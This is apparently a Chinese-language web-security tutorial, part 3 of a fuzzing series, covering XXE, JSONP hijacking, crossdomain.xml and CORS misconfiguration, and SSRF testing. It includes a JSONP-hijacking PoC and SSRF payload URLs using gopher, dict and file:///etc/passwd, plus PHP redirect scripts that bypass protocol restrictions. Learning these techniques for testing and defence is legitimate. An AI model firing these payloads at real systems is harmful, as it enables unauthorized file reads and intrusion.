主页 > 网络知识 > 谈高效漏洞挖掘之Fuzzing的艺术(3)

谈高效漏洞挖掘之Fuzzing的艺术(3)

 

10

 

 

11

 

三、XXE-Fuzzing

对于xxe的测试,是当一个数据包的中出现

<?xml version='1.0' encoding='utf-8' ?> <!DOCTYPE ... ... ?>

即对XML文件进行解析的场景中,都有可能出现XXE注入,如提交时,还有在上传中文件类型指定了excel、or word那么都可以进行Fuzz测试。关于XXE详细的利用可参考我之前的PHP与J**A之XXE漏洞详解与审计记录了白盒审计及黑盒测试利用详细的过程。

四、CSRF-Fuzzing 读取型CSRF

1)jsonp 劫持

 

1573991576207

 

POC

<script>function jsonp(data){alert(JSON.stringify(data));}</script> <script src="http://vul.com/user/center?callback=jsonp"></script>

2)cors ->crossdomain.xml->flash

若测试某资产时发现存在crossdomain.xml,并且内容如下:

<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy>

则存在swf的跨域的读取CSRF

 

img

 

详细利用可参考我之前的利用方式的记录里面包含了poc构造工具。另外关于CSRF的利用及其防护也可参考之前的一篇文章

3)CORS跨域资源请求

在请求的时候加上了请求头 Origin: ,而对应的响应包中出现了`Access-Control-Allow-Origin: 这个响应头其实就是访问控制允许,在这里是允许的请求的,所以目标是可以被跨域读取该网址的内容

五、SSRF-or-URL跳转漏洞ext-Fuzzing

资产测试时可能存在这样的URL:

http://www.xxx.com/vul.php?url=http://www.xxc.com/xxx.jpg https://xxx.com/notice/?info=xxx&gourl= https://xxx.com/api/?uri=xxx&redict=

对于如上这样的GET型的链接Fuzz的点有什么呢?SSRF、url跳转,结束了吗?ext扩展发散一下其实还有,只是平常利用的比较少或比较少想到在一次机缘巧合刚好想到也刚好遇上了,继续fuzzing下,其实还可以考虑CRLF,url_redict+CRLF、CRLF+XSS。

对于SSRF

测试

http://www.xxx.com/vul.php?url=http://127.0.0.1:port

根据回显内容和状态即可确定漏洞是否存在。

协议利用

gopher http://127.0.0.1/ssrf.php?url=gopher://127.0.0.1:2333/_test dict http://4o4notfound.org/ssrf.php?url=dict://127.0.0.1:port/info file http://4o4notfound.org/ssrf.php?url=file:///etc/passwd http http://4o4notfound.org/ssrf.php?url=http://xxx.com/302.php

协议限制为http下向服务端提交302.php

<?php header("Location: file:///etc/passwd"); ?>

辅助脚本302.php—-bypass http协议限制

<?php $ip = $_GET['ip']; $port = $_GET['port']; $scheme = $_GET['s']; $data = $_GET['data']; header("Location: $scheme://$ip:$port/$data"); ?>

测试完SSRF后发现没有该漏洞~

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!